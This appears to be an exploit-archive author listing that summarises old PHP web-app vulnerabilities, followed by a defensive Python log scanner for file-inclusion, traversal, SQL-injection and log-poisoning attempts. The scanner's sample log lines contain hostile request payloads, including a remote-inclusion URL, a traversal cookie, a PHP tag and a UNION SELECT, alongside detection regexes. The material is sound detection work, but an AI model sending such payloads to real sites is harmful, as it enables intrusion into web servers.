str0ke

106 exploits Active since May 1997
CVE-2006-4121 EXPLOITDB text WRITEUP
See-Commerce 1.0.625 - Remote File Inclusion via owimg.php3 path Parameter
PHP remote file inclusion vulnerability in owimg.php3 in See-Commerce 1.0.625 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter.
CVE-2005-3363 EXPLOITDB perl WORKING POC
Saphp Lesson - SQL Injection via ForumID Parameter
SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.
CVE-2006-0943 EXPLOITDB perl WORKING POC
PwsPHP 1.2.3 - SQL Injection via Sondages Module id Parameter
SQL injection vulnerability in the sondages module in index.php in PwsPHP 1.2.3 allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
CVE-2006-0973 EXPLOITDB perl WORKING POC
phpWebSite <= 0.10.2 - SQL Injection via Topic Parameter
SQL injection vulnerability in topics.php in Appalachian State University phpWebSite 0.10.2 and earlier allows remote attackers to execute arbitrary SQL commands via the topic parameter.
CVE-2008-2216 EXPLOITDB text WORKING POC
Project-Based Calendaring System 0.7.1 - Authenticated Arbitrary File Upload via yopy_upload.php
Unrestricted file upload vulnerability in src/yopy_upload.php in Project-Based Calendaring System (PBCS) 0.7.1 allows remote authenticated users to upload arbitrary files to tmp/uploads.
CVE-2006-4749 EXPLOITDB text WORKING POC
PHP Advanced Transfer Manager (phpATM) 1.20 - Remote File Inclusion via include_location Parameter
Multiple PHP remote file inclusion vulnerabilities in PHP Advanced Transfer Manager (phpATM) 1.20 allow remote attackers to execute arbitrary PHP code via the include_location parameter in (1) activate.php, (2) configure.php, (3) fileop.php, (4) getimg.php, (5) ipblocked.php, (6) register.php, (7) showrecent.php, (8) showtophits.php, (9) usrmanag.php, (10) viewer_bottom.php, (11) viewer_content.php, and (12) viewer_top.php. NOTE: The login.php and confirm.php vectors are already covered by CVE-2006-4594.
CVE-2005-0841 EXPLOITDB text WORKING POC
phpMyFamily 1.4.0 - SQL Injection via Multiple Parameters
SQL injection vulnerability in (1) people.php, (2) track.php, (3) edit.php, (4) document.php, (5) census.php, (6) passthru.php and possibly other php files in phpMyFamily 1.4.0 allows remote attackers to execute arbitrary SQL commands, as demonstrated via (1) the person parameter to people.php or (2) the Login field.
CVE-2008-1776 EXPLOITDB text WORKING POC
phpblock A8.4 - Remote Code Execution via PATH_TO_CODE Parameter
PHP remote file inclusion vulnerability in modules/basicfog/basicfogfactory.class.php in PhpBlock A8.4 allows remote attackers to execute arbitrary PHP code via a URL in the PATH_TO_CODE parameter.
EIP-2026-110955 EXPLOITDB perl WORKING POC
phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution
EIP-2026-110950 EXPLOITDB text WORKING POC
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure
CVE-2005-2086 EXPLOITDB WORKING POC
phpBB <= 2.0.15 - Remote File Inclusion in viewtopic.php
PHP remote file inclusion vulnerability in viewtopic.php in phpBB 2.0.15 and earlier allows remote attackers to execute arbitrary PHP code.
CVE-2005-0614 EXPLOITDB c++ WORKING POC
phpBB 2.0.12 - Privilege Escalation
sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.
CVE-2007-1907 EXPLOITDB text WORKING POC
Pathos Content Management System 0.92-2 - Remote File Inclusion via warn.php file Parameter
PHP remote file inclusion vulnerability in warn.php in Pathos Content Management System (CMS) 0.92-2 allows remote attackers to execute arbitrary PHP code via a URL in the file parameter.
CVE-2005-0999 EXPLOITDB bash WORKING POC
PHP-Nuke 6.x-7.6 - SQL Injection via Top Module querylang Parameter
SQL injection vulnerability in the Top module for PHP-Nuke 6.x through 7.6 allows remote attackers to execute arbitrary SQL commands via the querylang parameter.
CVE-2006-4103 EXPLOITDB text WORKING POC
phNNTP <= 1.3 - Remote File Inclusion via file_newsportal Parameter
PHP remote file inclusion vulnerability in article-raw.php in Jason Alexander phNNTP 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the file_newsportal parameter.
CVE-2007-5157 EXPLOITDB text WRITEUP
PHP Fidonet Tosser 1.3.0 - Remote Code Execution via SRC_PATH Parameter
PHP remote file inclusion vulnerability in phfito-post.php in Alex Kocharin PHP Fidonet Tosser (PhFiTo) 1.3.0 in phpFidoNode allows remote attackers to execute arbitrary PHP code via a URL in the SRC_PATH parameter to phfito-post.php.
CVE-2007-5016 EXPLOITDB perl WORKING POC
OneCMS 2.4 - SQL Injection via userreviews.php abc Parameter
SQL injection vulnerability in userreviews.php in OneCMS 2.4 allows remote attackers to execute arbitrary SQL commands via the abc parameter.
CVE-2006-6869 EXPLOITDB php WORKING POC
MAXdev MDForum <= 2.0.1 - Path Traversal / Local File Inclusion via PNSVlang Cookie
Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
CVE-2005-0414 EXPLOITDB text WORKING POC
MercuryBoard 1.1.1 - SQL Injection via Reply Post t or qu Parameter
SQL injection vulnerability in post.php for MercuryBoard 1.1.1 allows remote attackers to execute arbitrary SQL commands via a reply post action for index.php with (1) the t parameter or (2) the qu parameter.
CVE-2007-1837 EXPLOITDB text WORKING POC
MangoBery CMS 0.5.5 - Remote File Inclusion via Site_Path Parameter
Multiple PHP remote file inclusion vulnerabilities in MangoBery CMS 0.5.5 allow remote attackers to execute arbitrary PHP code via a URL in the Site_Path parameter to (1) boxes/quotes.php or (2) templates/mangobery/footer.sample.php.
CVE-2008-1635 EXPLOITDB text WORKING POC
Keep It Simple Guest Book <= 5.1.1 - Path Traversal via tmp_theme Parameter
Directory traversal vulnerability in view_private.php in Keep It Simple Guest Book (KISGB) 5.0.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tmp_theme parameter. NOTE: 5.1.1 is also reportedly affected.
CVE-2006-1662 EXPLOITDB perl WORKING POC
Limbo CMS 1.0.4.1-1.0.4.2 - Remote Code Execution via Itemid Parameter
The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.
CVE-2007-0337 EXPLOITDB php WORKING POC
KGB <= 1.9 - Directory Traversal and Arbitrary File Execution via skinnn Parameter
Directory traversal vulnerability in sesskglogadmin.php in KGB 1.9 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skinnn parameter, as demonstrated by invoking kg.php with a postek parameter containing PHP code, which is injected into a file in the kg directory, and then included by sesskglogadmin.php.
CVE-2008-1609 EXPLOITDB text WORKING POC
jaf_cms 4.0 RC2 - Remote File Inclusion via website and main_dir Parameters
Multiple PHP remote file inclusion vulnerabilities in just another flat file (JAF) CMS 4.0 RC2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) website parameter to (a) forum.php, (b) headlines.php, and (c) main.php in forum/, and (2) main_dir parameter to forum/forum.php. NOTE: other main_dir vectors are already covered by CVE-2006-7127.
EIP-2026-107926 EXPLOITDB php WORKING POC
Invision Power Board 1.3.1 - 'login.php' SQL Injection
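The entries above are dominated by three bug classes of that era of PHP software: remote file inclusion through a URL in a request parameter, local file inclusion through a `..` sequence in a parameter or cookie (with PHP first written into an Apache log so that the included file carries code, as the MDForum and KGB entries describe), and SQL injection through an unescaped parameter. As an added example that is not part of this listing or of any project named in it, the following Python script classifies access-log lines by those patterns. The log format (Apache "combined" plus a trailing quoted `%{Cookie}i` field), the IP addresses and every sample line are constructed for the example; the parameter and cookie names are taken from the entries above, and the regular expressions are deliberately narrow so they should be widened for real traffic.

```python
"""Flag RFI, LFI/traversal, SQL injection and log-poisoning attempts in access-log lines."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed (constructed) log format: Apache "combined" followed by a quoted %{Cookie}i field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)

URL_VALUE = re.compile(r'^(?:https?|ftp)://', re.I)          # RFI: parameter value is a URL
TRAVERSAL = re.compile(r'\.\.[\\/]')                        # LFI: dot-dot followed by a separator
SQLI = re.compile(
    r"union\s+(?:all\s+)?select|'\s*or\s+'?\d|\bor\s+1\s*=\s*1\b|--\s|/\*|\bsleep\s*\(", re.I
)
PHP_TAG = re.compile(r'<\?(?:php\b|=)', re.I)                # log poisoning: PHP open tag in a logged field


def decode(value: str) -> str:
    # Decode twice so a double-encoded sequence such as %252e%252e%252f is still caught.
    return unquote(unquote(value))


def params(target: str, cookie: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the query string and the Cookie header."""
    pairs = [(k, decode(v)) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    for part in cookie.split(';'):
        if '=' in part:
            k, v = part.split('=', 1)
            pairs.append(('cookie:' + k.strip(), decode(v.strip())))
    return pairs


def classify(line: str) -> Optional[Dict]:
    """Parse one log line and return its source, target and sorted list of findings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    findings = set()
    for name, value in params(f['target'], f['cookie'] or ''):
        if URL_VALUE.search(value):
            findings.add('rfi:' + name)
        if TRAVERSAL.search(value):
            findings.add('lfi:' + name)
        if SQLI.search(value):
            findings.add('sqli:' + name)
    # A PHP tag in any field Apache writes to the log is a log-poisoning attempt,
    # the first half of the MDForum/KGB style chain (poison the log, then include it).
    for field in ('target', 'referer', 'ua'):
        if PHP_TAG.search(decode(f[field] or '')):
            findings.add('poison:' + field)
    return {'ip': f['ip'], 'target': f['target'], 'findings': sorted(findings)}


def scan(lines: List[str]) -> List[Dict]:
    """Return only the lines that produced at least one finding, in input order."""
    return [r for r in (classify(l) for l in lines) if r and r['findings']]


# Constructed sample log: one benign request followed by one request per bug class.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2008:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0" "PHPSESSID=abc"',
    '203.0.113.8 - - [10/Mar/2008:12:00:02 +0000] "GET /owimg.php3?path=http://198.51.100.9/x.txt? HTTP/1.1" 200 128 "-" "Mozilla/5.0" "-"',
    '203.0.113.9 - - [10/Mar/2008:12:00:03 +0000] "GET /error.php HTTP/1.1" 200 64 "-" "Mozilla/5.0" "PNSVlang=../../../../var/log/apache2/access_log"',
    '203.0.113.9 - - [10/Mar/2008:12:00:04 +0000] "GET /error.php HTTP/1.1" 200 64 "-" "<?php echo 1; ?>" "PNSVlang=en"',
    '203.0.113.10 - - [10/Mar/2008:12:00:05 +0000] "GET /modules.php?name=Top&querylang=%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['target'], ','.join(hit['findings']))
```

Run against a real log, the same `scan` function takes the file's lines; the cookie field only appears if the server's LogFormat actually writes `%{Cookie}i`, otherwise the regex still matches and cookie-based traversal (the MDForum entry) is simply not visible in the log.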